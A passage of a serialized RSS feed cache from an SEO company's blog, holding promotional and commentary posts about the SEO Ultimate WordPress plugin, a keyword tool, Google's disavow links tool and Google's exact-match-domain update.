look.</p>\n<p>Combine this with the robust SEO power of SEO Ultimate and you can see why we&#8217;re excited&#8230;</p>\n<p>For a sneak peek, you can read a few of the <a href=\"http://www.wpultimatetheme.com/wp-ultimate-features/\">WP Ultimate features</a>, or stay tuned as we release more information on the launch details over the next few weeks.</p>\n<h3 style=\"text-align: center;\"><strong><span style=\"color: #ff0000;\">WARNING!</span></strong></h3>\n<p>I prefer transparency about everything, so, do <strong>not</strong> be surprised from the opt-in form prior to accessing the video tutorial. The video is over one hour long and jam-packed with  <strong>EVERYTHING</strong> you&#8217;ll need to get the most our of SEO Ultimate.</p>\n<p>Also, keep in mind, we intend on putting other advanced training videos and tactics <strong>which will not be featured anywhere else</strong> in the members section. By opting-in, you&#8217;ll gain access to that material and will also be notified when we launch the WP Ultimate Framework.</p>\n<p>We hate spam as much as you do and respect your privacy. You can opt out-at any time.  This (content-locking) method simply helps us manage our user-base more efficiently and separate the power-users from the sheep.</p>\n<div id=\"attachment_9190\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.wpultimatetheme.com/seo-ultimate-video-tutorial/\"><img class=\"size-full wp-image-9190\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/Opt-In.jpg\" alt=\"\" width=\"400\" height=\"440\" /></a><p class=\"wp-caption-text\">Enter First Name and Email Address for Instant Access! </p></div>\n<h2 style=\"text-align: center;\">&gt;&gt;&gt;<a href=\"http://www.wpultimatetheme.com/seo-ultimate-video-tutorial/\">Click Here to Watch the Official SEO Ultimate Video Tutorial</a>&lt;&lt;&lt;</h2>\n<p>We wish you the best in 2013 and look forward to providing the best, cutting-edge SEO tools for WordPress &#8211; period! Help SEO Design Solutions spread the word by sharing or commenting on this post!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=9GlCsPvzX18:pHCh2qSPmZg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/9GlCsPvzX18\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:327:\"It’s that time again to kick off the new year and what better way to do so than (1) a new update to - &#8220;The Real All-In-One SEO Plugin for WordPress&#8221; &#8211; SEO Ultimate and (2) to  introduce (our long-awaited) comprehensive video tutorial covering each SEO Module in detail for our plugin. For the record, [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"2\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:105:\"http://www.seodesignsolutions.com/blog/wordpress-seo/the-official-seo-ultimate-wordpress-plugin-tutorial/\";}s:7:\"summary\";s:327:\"It’s that time again to kick off the new year and what better way to do so than (1) a new update to - &#8220;The Real All-In-One SEO Plugin for WordPress&#8221; &#8211; SEO Ultimate and (2) to  introduce (our long-awaited) comprehensive video tutorial covering each SEO Module in detail for our plugin. For the record, [...]\";s:12:\"atom_content\";s:7927:\"<p>It’s that time again to kick off the new year and what better way to do so than (1) a new update to <strong>- &#8220;The Real All-In-One SEO Plugin for WordPress&#8221;</strong> &#8211; <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> and (2) to  introduce (our long-awaited) comprehensive video tutorial covering each SEO Module in detail for our plugin.</p>\n<div id=\"attachment_9172\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><a href=\"http://www.wpultimatetheme.com/seo-ultimate-video-tutorial/\"><img class=\"size-full wp-image-9172\" title=\"SEO_Ultimate_Logo\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/SEO_Ultimate_Logo.jpg\" alt=\"\" width=\"500\" height=\"233\" /></a><p class=\"wp-caption-text\">Click to Watch the Long-Awaited SEO Ultimate Video Tutorial (Opt-In Required)</p></div>\n<p>For the record, SEO Ultimate <strong>was NOT designed for the public</strong>; it was originally designed as an in-house SEO tool deployed specifically to provide unparalleled on page SEO setup for WordPress. By consolidating these features into modules (that we could simply toggle on or off and configure at will) allowed us to virtually dominate hundreds of markets for our clients (without having to painstakingly customize the code time and time again).<span id=\"more-9173\"></span></p>\n<h3>Why All the Secrecy with SEO Ultimate?</h3>\n<p>Many wondered &#8211; if SEO Ultimate is so awesome, then why not show us how to use this thing? Well, frankly,  if you weren&#8217;t a client, then we didn&#8217;t want to create unnecessary competition in our markets, especially from giving away our most cherished methods free of charge.</p>\n<p>We hope this explains the lack of documentation over the years <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/\">aside from version updates</a> where we briefly informed users about new features, but in all honesty, we kept <strong>the real power of SEO Ultimate</strong> close to the chest &#8211; until now. The time has come to provide detailed documentation of each module, why it&#8217;s important and of course, how to use it &#8211; courtesy of our lead developer <a href=\"http://profiles.wordpress.org/JohnLamansky/\">John Lamansky</a>.</p>\n<p>Unlike some half-baked SEO plugins, we poured over 15 years of real world advanced SEO principles into this plugin. Prior to releasing this tutorial, the argument of just how powerful SEO Ultimate vs. any other SEO plugin <strong><em>may</em></strong> have been in question. However, after watching the video, this should clear up any confusion about <em>the depth</em> or <em>the real purpose</em> behind each module and the scope of the plugin.</p>\n<p>SEO Ultimate has amazing features such as:</p>\n<ul>\n<li>Twitter Cards</li>\n<li>Opengraph Integration</li>\n<li>Rich Snippets (For Local Pages, Reviews and More)</li>\n<li>Automated Internal Linking (with New Link Dampening Feature)</li>\n<li>Affiliate Link Masking</li>\n<li>A Mass/Bulk Editor for Complete Editing for Meta Tags, Titles, Keywords, Categories, Media Attachments, Post Format Archives and much, much more.</li>\n</ul>\n<h3>The WP Ultimate Framework</h3>\n<p>While the deliberate suppression of information regarding the inner workings of the SEO Ultimate features was not entirely deliberate,  there was a concurrent<strong> master plan</strong> in the works. Just think of it like a 6  year chess game where each  move unfolds another strategic layer of the battle plan, only to culminate in a brilliant (market-dominating) end-game and check mate. It&#8217;s like that, but in this case its all about the <a href=\"http://www.wpultimatetheme.com/\">WP Ultimate Framework</a>.</p>\n<div id=\"attachment_9174\" class=\"wp-caption aligncenter\" style=\"width: 310px\"><a href=\"http://www.wpultimatetheme.com/\"><img class=\"size-full wp-image-9174\" title=\"WPU_logo\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/WPU_logo.jpg\" alt=\"\" width=\"300\" height=\"136\" /></a><p class=\"wp-caption-text\">The WP Ultimate Framework for WordPress</p></div>\n<p>The market dominating check mate in this scenario was that our proprietary SEO platform  (<a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a>) was absorbed and integrated into our WordPress Framework to  provide unparalled SEO &amp; Design flexibility. The beauty for end-users is, once you gain access to the framework, you also get access to the training as well.</p>\n<h3>Is WP Ultimate Ready Yet?</h3>\n<p>Thank you for your patience, as many of you know for the past two years we&#8217;ve toiled away in the labs like obsessive compulsive perfectionists testing the WPU Framework and we&#8217;re nearly finished coding and stress-testing now. When complete, we will release 1000 copies to a select group, then take that feedback and roll even more powerful features into the Framework.</p>\n<p>Consider it a work in progress, however, recent additions to the framework include adding Twitter Bootstrap,  Google Fonts, a Lightbox Feature which can be toggled via a timer or  link), a more comprehensive Style Editor, a New Media Manager suite to insert ads, media, shortcodes and  more and a Completely Reworked Grid System to handle responsive layouts,  fluid layouts or the ability to create fixed width layouts to liberate  your design impulse and display options and build websites that rank as great as they look.</p>\n<p>Combine this with the robust SEO power of SEO Ultimate and you can see why we&#8217;re excited&#8230;</p>\n<p>For a sneak peek, you can read a few of the <a href=\"http://www.wpultimatetheme.com/wp-ultimate-features/\">WP Ultimate features</a>, or stay tuned as we release more information on the launch details over the next few weeks.</p>\n<h3 style=\"text-align: center;\"><strong><span style=\"color: #ff0000;\">WARNING!</span></strong></h3>\n<p>I prefer transparency about everything, so, do <strong>not</strong> be surprised from the opt-in form prior to accessing the video tutorial. The video is over one hour long and jam-packed with  <strong>EVERYTHING</strong> you&#8217;ll need to get the most our of SEO Ultimate.</p>\n<p>Also, keep in mind, we intend on putting other advanced training videos and tactics <strong>which will not be featured anywhere else</strong> in the members section. By opting-in, you&#8217;ll gain access to that material and will also be notified when we launch the WP Ultimate Framework.</p>\n<p>We hate spam as much as you do and respect your privacy. You can opt out-at any time.  This (content-locking) method simply helps us manage our user-base more efficiently and separate the power-users from the sheep.</p>\n<div id=\"attachment_9190\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.wpultimatetheme.com/seo-ultimate-video-tutorial/\"><img class=\"size-full wp-image-9190\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/Opt-In.jpg\" alt=\"\" width=\"400\" height=\"440\" /></a><p class=\"wp-caption-text\">Enter First Name and Email Address for Instant Access! </p></div>\n<h2 style=\"text-align: center;\">&gt;&gt;&gt;<a href=\"http://www.wpultimatetheme.com/seo-ultimate-video-tutorial/\">Click Here to Watch the Official SEO Ultimate Video Tutorial</a>&lt;&lt;&lt;</h2>\n<p>We wish you the best in 2013 and look forward to providing the best, cutting-edge SEO tools for WordPress &#8211; period! Help SEO Design Solutions spread the word by sharing or commenting on this post!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=9GlCsPvzX18:pHCh2qSPmZg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/9GlCsPvzX18\" height=\"1\" width=\"1\"/>\";}i:11;a:12:{s:5:\"title\";s:44:\"The Last Keyword Tool: SEO Tactics Revealed!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/33-91D7MqvE/\";s:8:\"category\";s:76:\"SEO VideosKeyword ToolsNetwork Empire Last Keyword ToolThe Last Keyword Tool\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Sat, 27 Oct 2012 13:54:26 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9166\";s:7:\"content\";a:1:{s:7:\"encoded\";s:1639:\"<p>Keywords are the cornerstone of any online conversation. Metrics such as user engagement, conversion and search engine optimization all rely on critical keywords and their convergence to convey relevancy and intent to your audience. The question is, how do you know which keywords are worth using and which are better to ignore?</p>\n<p><object width=\"500\" height=\"281\"><param name=\"movie\" value=\"http://www.youtube.com/v/grQ4qZSzjBc?version=3&amp;hl=en_US\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/grQ4qZSzjBc?version=3&amp;hl=en_US\" type=\"application/x-shockwave-flash\" width=\"500\" height=\"281\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>Watch the video above (which is an insightful view into the mind of Sue <strong>&#8220;The Architect&#8221;</strong> Bell from Themezoom / Network Empire) as she reveals dozens of useful SEO strategies for harvesting lucrative keywords and how to integrate them into your semantic website architecture using <a href=\"http://lastkeywordtool.themezoom.com/?ref=sds\">The Last Keyword Tool</a>.</p>\n<p>Enjoy!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=33-91D7MqvE:VM0WoZ8DbNo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/33-91D7MqvE\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:350:\"Keywords are the cornerstone of any online conversation. Metrics such as user engagement, conversion and search engine optimization all rely on critical keywords and their convergence to convey relevancy and intent to your audience. The question is, how do you know which keywords are worth using and which are better to ignore? Watch the video [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"6\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:93:\"http://www.seodesignsolutions.com/blog/seo-videos/the-last-keyword-tool-seo-tactics-revealed/\";}s:7:\"summary\";s:350:\"Keywords are the cornerstone of any online conversation. Metrics such as user engagement, conversion and search engine optimization all rely on critical keywords and their convergence to convey relevancy and intent to your audience. The question is, how do you know which keywords are worth using and which are better to ignore? Watch the video [...]\";s:12:\"atom_content\";s:1639:\"<p>Keywords are the cornerstone of any online conversation. Metrics such as user engagement, conversion and search engine optimization all rely on critical keywords and their convergence to convey relevancy and intent to your audience. The question is, how do you know which keywords are worth using and which are better to ignore?</p>\n<p><object width=\"500\" height=\"281\"><param name=\"movie\" value=\"http://www.youtube.com/v/grQ4qZSzjBc?version=3&amp;hl=en_US\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/grQ4qZSzjBc?version=3&amp;hl=en_US\" type=\"application/x-shockwave-flash\" width=\"500\" height=\"281\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>Watch the video above (which is an insightful view into the mind of Sue <strong>&#8220;The Architect&#8221;</strong> Bell from Themezoom / Network Empire) as she reveals dozens of useful SEO strategies for harvesting lucrative keywords and how to integrate them into your semantic website architecture using <a href=\"http://lastkeywordtool.themezoom.com/?ref=sds\">The Last Keyword Tool</a>.</p>\n<p>Enjoy!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=33-91D7MqvE:VM0WoZ8DbNo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/33-91D7MqvE\" height=\"1\" width=\"1\"/>\";}i:12;a:12:{s:5:\"title\";s:40:\"Google Disavow Links Tool: Declassified!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/wLnwxXKpQsQ/\";s:8:\"category\";s:13:\"Internet News\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Thu, 18 Oct 2012 06:18:13 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9159\";s:7:\"content\";a:1:{s:7:\"encoded\";s:4309:\"<p>In case you haven’t heard, Google has released a new <a href=\"http://googlewebmastercentral.blogspot.com/2012/10/a-new-tool-to-disavow-links.html\">disavow links tool</a> allowing you to disavow (deny the existence of) any <strong>questionable</strong> backlinks.<a href=\"http://www.seodesignsolutions.com/blog/internet-news/google-disavow-links-tool-declassified/\"><img class=\"aligncenter size-full wp-image-9160\" title=\"mission-impossible\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/10/mission-impossible.jpg\" alt=\"Google Link Disavow Tool\" width=\"500\" height=\"315\" /></a></p>\n<p>While the first thought that comes to mind is mission impossible – <strong>“if you are caught, the government will disavow your existence”</strong>. Now, it seems that webmasters have the ability to do this with their links (<em>if their mission fails</em>).<span id=\"more-9159\"></span></p>\n<p>On a brief comical Google conspiracy side note: now, the “<a rel=\"nofollow\" href=\"http://searchengineland.com/google-explains-new-link-warnings-says-dont-panic-but-dont-ignore-128888\">unnatural links warning</a>” broadcast email from Google <a href=\"http://googlewebmastercentral.blogspot.com/2012/07/new-notifications-about-inbound-links.html\" target=\"_blank\">this July</a> makes perfect strategic sense.</p>\n<p>Was this part of the plan all along, to scare webmasters with the notice then have them participate in the cleanup with the new <strong>link disavow tool</strong> (to further improve their algorithm) like a mass web-wide manual review using us as user generated base of <strong>“motivated”</strong> volunteers? Hmmm &lt;<em>fingers on chin in perplexed pondering gesture</em>&gt;, the world may never know.</p>\n<p>Anyway, so much for the Google conspiracy theories or movie trivia, so how does the tool work? After logging in, simply click the red button and then proceed to the browse / upload feature.</p>\n<p><a href=\"http://googlewebmastercentral.blogspot.com/2012/10/a-new-tool-to-disavow-links.html\" target=\"_blank\"><img class=\"aligncenter size-full wp-image-9161\" title=\"link-disavow-sc1\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/10/link-disavow-sc1.jpg\" alt=\"\" width=\"506\" height=\"267\" /></a></p>\n<p style=\"text-align: center;\">Next, simply select the link location file (a .txt file with the URL’s or domains in question) and upload it and that’s it.</p>\n<p><a href=\"http://googlewebmastercentral.blogspot.com/2012/10/a-new-tool-to-disavow-links.html\" target=\"_blank\"><img class=\"aligncenter size-full wp-image-9162\" title=\"link-disavow-sc2\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/10/link-disavow-sc2.jpg\" alt=\"\" width=\"500\" height=\"243\" /></a></p>\n<p>After you submit your file, allow Google ample time to re-crawl the links (<em>with Googlebot armed with the link abort list</em>) and monitor the SERPs for signs of <strong><em>Penguin symptom- like</em></strong> recovery.</p>\n<p>Google suggests not to disavow links from your own website, however aside from that, this is one way to get rid of pesky links which could be hurting your website in the SERPs (search engine result pages).</p>\n<p>Since you can’t control who links to you, this is a great way to unwind potential backlinks acquired from negative SEO via competitors or otherwise.</p>\n<p>In closing, there are no guarantees that they will disavow any or all links found in the discovery from the uploaded file, but this tool is better than having no option at all and having to sit it out in the penalty box indefinitely (if your website has lost rankings or been penalized in some way as a result of bad <a href=\"http://www.seoengine.com/link-neighborhood.htm\">link neighborhoods</a>).</p>\n<p>Consider yourself debriefed and good luck on your mission: <strong>Project SERP Recovery</strong>.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=wLnwxXKpQsQ:IHJnYvKxqCU:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/wLnwxXKpQsQ\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:343:\"In case you haven’t heard, Google has released a new disavow links tool allowing you to disavow (deny the existence of) any questionable backlinks. While the first thought that comes to mind is mission impossible – “if you are caught, the government will disavow your existence”. Now, it seems that webmasters have the ability to [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"7\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:92:\"http://www.seodesignsolutions.com/blog/internet-news/google-disavow-links-tool-declassified/\";}s:7:\"summary\";s:343:\"In case you haven’t heard, Google has released a new disavow links tool allowing you to disavow (deny the existence of) any questionable backlinks. While the first thought that comes to mind is mission impossible – “if you are caught, the government will disavow your existence”. Now, it seems that webmasters have the ability to [...]\";s:12:\"atom_content\";s:4309:\"<p>In case you haven’t heard, Google has released a new <a href=\"http://googlewebmastercentral.blogspot.com/2012/10/a-new-tool-to-disavow-links.html\">disavow links tool</a> allowing you to disavow (deny the existence of) any <strong>questionable</strong> backlinks.<a href=\"http://www.seodesignsolutions.com/blog/internet-news/google-disavow-links-tool-declassified/\"><img class=\"aligncenter size-full wp-image-9160\" title=\"mission-impossible\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/10/mission-impossible.jpg\" alt=\"Google Link Disavow Tool\" width=\"500\" height=\"315\" /></a></p>\n<p>While the first thought that comes to mind is mission impossible – <strong>“if you are caught, the government will disavow your existence”</strong>. Now, it seems that webmasters have the ability to do this with their links (<em>if their mission fails</em>).<span id=\"more-9159\"></span></p>\n<p>On a brief comical Google conspiracy side note: now, the “<a rel=\"nofollow\" href=\"http://searchengineland.com/google-explains-new-link-warnings-says-dont-panic-but-dont-ignore-128888\">unnatural links warning</a>” broadcast email from Google <a href=\"http://googlewebmastercentral.blogspot.com/2012/07/new-notifications-about-inbound-links.html\" target=\"_blank\">this July</a> makes perfect strategic sense.</p>\n<p>Was this part of the plan all along, to scare webmasters with the notice then have them participate in the cleanup with the new <strong>link disavow tool</strong> (to further improve their algorithm) like a mass web-wide manual review using us as user generated base of <strong>“motivated”</strong> volunteers? Hmmm &lt;<em>fingers on chin in perplexed pondering gesture</em>&gt;, the world may never know.</p>\n<p>Anyway, so much for the Google conspiracy theories or movie trivia, so how does the tool work? After logging in, simply click the red button and then proceed to the browse / upload feature.</p>\n<p><a href=\"http://googlewebmastercentral.blogspot.com/2012/10/a-new-tool-to-disavow-links.html\" target=\"_blank\"><img class=\"aligncenter size-full wp-image-9161\" title=\"link-disavow-sc1\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/10/link-disavow-sc1.jpg\" alt=\"\" width=\"506\" height=\"267\" /></a></p>\n<p style=\"text-align: center;\">Next, simply select the link location file (a .txt file with the URL’s or domains in question) and upload it and that’s it.</p>\n<p><a href=\"http://googlewebmastercentral.blogspot.com/2012/10/a-new-tool-to-disavow-links.html\" target=\"_blank\"><img class=\"aligncenter size-full wp-image-9162\" title=\"link-disavow-sc2\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/10/link-disavow-sc2.jpg\" alt=\"\" width=\"500\" height=\"243\" /></a></p>\n<p>After you submit your file, allow Google ample time to re-crawl the links (<em>with Googlebot armed with the link abort list</em>) and monitor the SERPs for signs of <strong><em>Penguin symptom- like</em></strong> recovery.</p>\n<p>Google suggests not to disavow links from your own website, however aside from that, this is one way to get rid of pesky links which could be hurting your website in the SERPs (search engine result pages).</p>\n<p>Since you can’t control who links to you, this is a great way to unwind potential backlinks acquired from negative SEO via competitors or otherwise.</p>\n<p>In closing, there are no guarantees that they will disavow any or all links found in the discovery from the uploaded file, but this tool is better than having no option at all and having to sit it out in the penalty box indefinitely (if your website has lost rankings or been penalized in some way as a result of bad <a href=\"http://www.seoengine.com/link-neighborhood.htm\">link neighborhoods</a>).</p>\n<p>Consider yourself debriefed and good luck on your mission: <strong>Project SERP Recovery</strong>.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=wLnwxXKpQsQ:IHJnYvKxqCU:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/wLnwxXKpQsQ\" height=\"1\" width=\"1\"/>\";}i:13;a:12:{s:5:\"title\";s:60:\"The Google EMD Update: Don’t Let Bad Search Happen to You!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/ryL6RtTC0UA/\";s:8:\"category\";s:3:\"SEO\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Thu, 11 Oct 2012 06:46:20 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9145\";s:7:\"content\";a:1:{s:7:\"encoded\";s:14843:\"<p>If you’re a webmaster and have been impacted (penalized, lost traffic or have been caught in an algorithmic filter) from Google, the conclusion is obvious that Google isn’t trying to win a popularity contests with their user base lately.</p>\n<p><a href=\"http://www.seodesignsolutions.com/blog/seo/the-google-emd-update-don%E2%80%99t-let-bad-search-happen-to-you/\"><img class=\"aligncenter size-full wp-image-9149\" title=\"dont-let-bad-search-happen-to-you\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/10/dont-let-bad-search-happen-to-you.jpg\" alt=\"\" width=\"500\" height=\"274\" /></a></p>\n<p>First, it was the dawn of the web shattering <strong>Panda update</strong> (a content classifier designed to remove low quality web pages, websites that copied from other websites or weak internal pages with minimal value) from their index,  second, the backlink witch hunt / <strong>Penguin update</strong> (designed to demote websites from ranking highly which have <em>off-topic</em> or inbound links from low quality websites) and now <strong>the EMD update</strong> (the <strong>exact match domain update</strong>) which demotes websites which have exact match domains from easily ranking for their core keywords.<span id=\"more-9145\"></span></p>\n<h2>What&#8217;s an EMD?</h2>\n<p>While most savvy SEO’s or online marketing  types understand the lingo, for those unfamiliar with the terminology,  exact match domains are websites such as babycribs.com which <em>in the past</em> would rank rather easily for the key phrase “baby cribs”.</p>\n<p>Exact match domains are typically highly sought from <strong>“Domaineers”</strong> (individuals who purchase, collect, monetize or sell domains) due to their ability to (1) rank highly in search engines with a fraction of the effort by the virtue of the domain name or (2) monetize those sites due to the commercial viability (since consumers easily commit the domain name to memory); that is, until <strong>the Google EMD update</strong>.</p>\n<p>Before this update, there was a glaring loophole in search engines (Google in particular) which allowed exact match domains to rank uncontested with minimal SEO (sometimes within days of being created). So, instead of spending money on SEO, backlinks or promotion, businesses would often spend the money on acquiring a top level exact match domain.</p>\n<p>The reason is simple, a website in the #1 position for an organic search phrase can garner 42-70% of the click through traffic for a keyword (compared to 2% in the number 10 position on the page); and since 7 out of 10 people typically click the organic results instead of paid (PPC) results, this is a major blow if dethroned from the #1 position or top 3 organic positions on the page.</p>\n<h2>Minor or Major Change?</h2>\n<p>On September 28<sup>th</sup>, avid SEO personality <a href=\"http://www.seroundtable.com/google-emd-update-15776.html\">Barry Schwartz</a> from <strong>SEO Round Table</strong> gleaned a tidbit of relevant info on the EMD update. Apparently, in a recent tweet by Matt Cutts (head of Google’s Web Spam Team) he states – “<em>Minor weather report: small upcoming Google algo change will reduce low-quality &#8220;exact-match&#8221; domains in search results.</em>”</p>\n<p>Cutts later tweeted – <em>“New exact-match domain (EMD) algo affects 0.6% of English-US queries to a noticeable degree. Unrelated to Panda/Penguin”.</em></p>\n<p>Now your first thought, 0.6 that’s not so bad right? That all depends on the <a href=\"http://www.theatlantic.com/technology/archive/2012/09/google-news-at-10-how-the-algorithm-won-over-the-news-industry/262641/\">sheer volume</a> of total English-US queries, and, if that number is <strong>theoretically</strong> 100,000,000,000 queries per day (100 billion), that represents 60 million potential queries <strong>affected daily</strong> by this change.</p>\n<p>There’s <strong><em>nothing minor about this</em></strong> or any other algorithm, infrastructure or classifier change in a search engines’ index, more specifically, this is the equivalent of Hurricane Katrina to a small business or website <em>not fortified by alternative traffic or citation sources</em>.</p>\n<p>While most webmasters may not own an EMD or rely strictly on the ranking power of an exact match domain alone; if you do own a full or partial hyphenated EMD and your website’s major keywords disappear, your revenue is and business model are inevitably impacted instantly.</p>\n<p>As far as chain reactions go, once rankings dip, your cash flow could tank or you could inevitably go out of business, unless you have a plan B for traffic (particularly in this economy).</p>\n<p>Based on the inquiries we have received for the past 6 months from companies in need of solutions to Google changes, most webmasters (business owners, individuals and affiliates alike), do not have a plan B and are <strong>puzzled, frustrated, agitated or struggling</strong> to determine <em>what happened to their traffic</em>, <em>what <strong>they did</strong> or <strong>did not do</strong></em> and, most of all <strong>why now</strong>, when things were just fine before the latest <span style=\"text-decoration: line-through;\">monkey wrench</span> tweak. Was it a competitor throwing a batch of bad links from negative SEO, or did they simply trip a filter and get hit with a penalty?</p>\n<p>In either case, it’s dangerous for webmasters to blindly assume that once you attain a high ranking position for your primary keyword (exact match domain or otherwise) that your website won’t be churned off the page (from an update, filter or algorithm change).</p>\n<p>Often, <strong>it’s not even your site being penalized</strong>; it’s the other sites that linked to yours that took the hit (and your website is no longer buoyant in the search results as a result). Keep in mind that when they purge their index many of the sites that were holding other sites up (by virtue of their citation/links) have been caught (essentially algorithmically neutered) from passing link flow to other websites.</p>\n<p>Since citation leaves a footprint, if your website happened to receive sustenance from an algorithmically compromised website, then, like a chain of dominos, the link-flow dropped off. Essentially, you start from zero again and fall to the back of the line (rolled back 5-10 pages in the search results) or sometimes worse (not ranking at all for the keyword).</p>\n<p>The point is, there are no guarantees when it comes to how search engines tally links, popularity, relevance and value, it’s merely their perception of <strong>what they think their users want</strong>. What Google forgets is, it’s those same users <em>who own websites and have become dependent on that traffic for their business</em> who are getting thrown under the bus and have no idea why.</p>\n<p>This process has gone on for years and quite frankly, people are getting tired of running the gauntlet and trying to appease their new rules (starting with things like adding nofollow attributes to all outbound links) because Google couldn’t detect link intent i.e. <strong>“paid links”</strong> with their algorithm and wanted to impose using nofollow to webmasters to add nofollow attributes to all outbound links (using the fear of penalties) as a consequence.</p>\n<p>Over time, Google just kept a plethora of updates coming (in the name or relevancy) from the Florida Update, the Big Daddy Update, the May Day Update, The Vince Update, the Panda Update, Penguin Update, etc., <strong>enough is enough already</strong>.</p>\n<h2>Is SEO Still Important?</h2>\n<p>Is SEO still important? Yes and No!</p>\n<p>SEO is important if you have (1) implemented conversion optimization first, so that regardless of <strong>where your traffic emanates from</strong>, it will result in increased ROI (return on investment)  via more subscriptions, social engagement (viral traffic) or sales and (2) If you have the budget and / or staff to afford implementing the often tedious work associated with SEO.</p>\n<p>SEO is NOT important if want to spend more money on Television, Radio, Newspaper ads, Pay-Per-Click, have a strong offline marketing push. While Google&#8217;s claim for making these changes is relevancy, their motivation has transcended &#8220;building the best search engine&#8221; and has become something far more transparent (scrub <span style=\"text-decoration: line-through;\">compromise</span> the organic search    results and focus on paid search which provides approximately 98% of all profits for Google).</p>\n<h2>How Do You Get 